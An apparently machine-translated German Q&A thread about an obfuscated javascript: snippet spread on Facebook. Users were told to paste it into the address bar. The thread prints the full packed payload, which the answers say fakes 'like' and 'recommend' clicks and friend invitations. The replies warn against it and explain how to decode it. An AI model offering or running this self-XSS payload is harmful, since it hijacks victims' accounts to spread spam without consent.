Was genau hat es mit diesem Stück von JavaScript nicht?
Sah ich diese Seite wächst in der Popularität unter meine sozialen Kreise auf Facebook, was 98 Prozent bla bla... und es geht den Benutzer durch kopieren der unten JavaScript (ich fügte hinzu, einige Einrückung um Sie lesbarer zu machen) in Ihre Adresse bar. Sieht dodgy zu mir, aber ich habe nur eine sehr grundlegende Kenntnisse in JavaScript.
Einfach gesagt, was macht das?
javascript:(function(){
a='app120668947950042_jop';
b='app120668947950042_jode';
ifc='app120668947950042_ifc';
ifo='app120668947950042_ifo';
mw='app120668947950042_mwrapper';
eval(function(p,a,c,k,e,r){
e=function(c){
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}
;
if(!''.replace(/^/,String)){
while(c--)r[e(c)]=k[c]||e(c);
k=[function(e){
return r[e]}
];
e=function(){
return'\\w+'}
;
c=1}
;
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}
('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];
d=U;
d[e[2]](V)[e[1]][e[0]]=e[3];
d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);
m=d[e[2]](e[7]);
c=d[e[9]](e[8]);
c[e[11]](e[10],I,I);
s[e[12]](c);
C(D(){
W[e[13]]()}
,E);
C(D(){
X[e[16]](e[14],e[15])}
,E);
C(D(){
m[e[12]](c);
d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]}
,E);
',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{
}
))})();
- Das riecht phishy für mich....
- Ich bin sicher, wenn Sie klebte es in Eure Adressleiste, Sie würde es herausfinden. Würde ich eher nicht tun.
- Stimmen. Super lückenhaft.
- Vielen Dank für diese Bearbeitung 😀 Sehen 'Dosis' ganz über dem Platz war für mich verrückt.
Du musst angemeldet sein, um einen Kommentar abzugeben.
Ich weiß nicht, so viele sind dieses downvoting. Sie sind absolut zu Recht misstrauisch verpackt und auch sonst-verschleierte Skripts, die vor allem mit Hautausschlag der malvertisements Auswirkungen auf die FB-apps im moment.
Der erste trick ist, ersetzen Sie die
eval
auf die Ergebnisse der Entpacker mit eineralert
so können Sie den code anstatt es auszuführen. Das gibt Ihnen etwas, das Sie leicht (aber langweilig) manuell zu entschlüsseln:Wie es aussieht, ist vorgetäuscht, klicken Sie auf den "gefällt mir" und "empfehlen" - buttons (und der nachfolgende Dialog), unter Umgehung der normalen Kontrollen FB benötigen, um mit der Website interagieren.
Ich würde Berichts dieser Seite auf FB.
Im Allgemeinen, etwas, das Sie auffordert, geben Sie einen JavaScript-URL ist nichts gutes. Dies ist die poor-man ' s-XSS. Indem jemand den code auf einer Seite durch eine JS-URL, auf die Sie Vertrauen darauf, dass Sie tun, was Sie wollen mit Ihrer Nutzung der Website, als dieser groben social-engineering-Versuch demonstriert werden. Es ist deprimierend, wenn viele Leute sind, fallen für diesen. Vielleicht ist es Zeit für Browser zu verbieten, Tippen
javascript:
URLs in der Adressleiste.Fluch Sie Netscape für die Erfindung des hässlichen
javascript:
nicht-wirklich-eine-URL-hack und die Tausende von Sicherheitslücken, die dazu geführt haben von ihm!Auf den ersten Blick sieht es aus wie eine Verpackung die Funktion, für die Komprimierung von code in einen string. Betrachten Sie es wie gzip-Komprimierung.
Sieht wie die code laden Sie Ihre Freunde zum Beitritt in eine Gruppe oder etwas entlang jenen Linien..
Habe Sie im Umlauf facebook für eine Weile.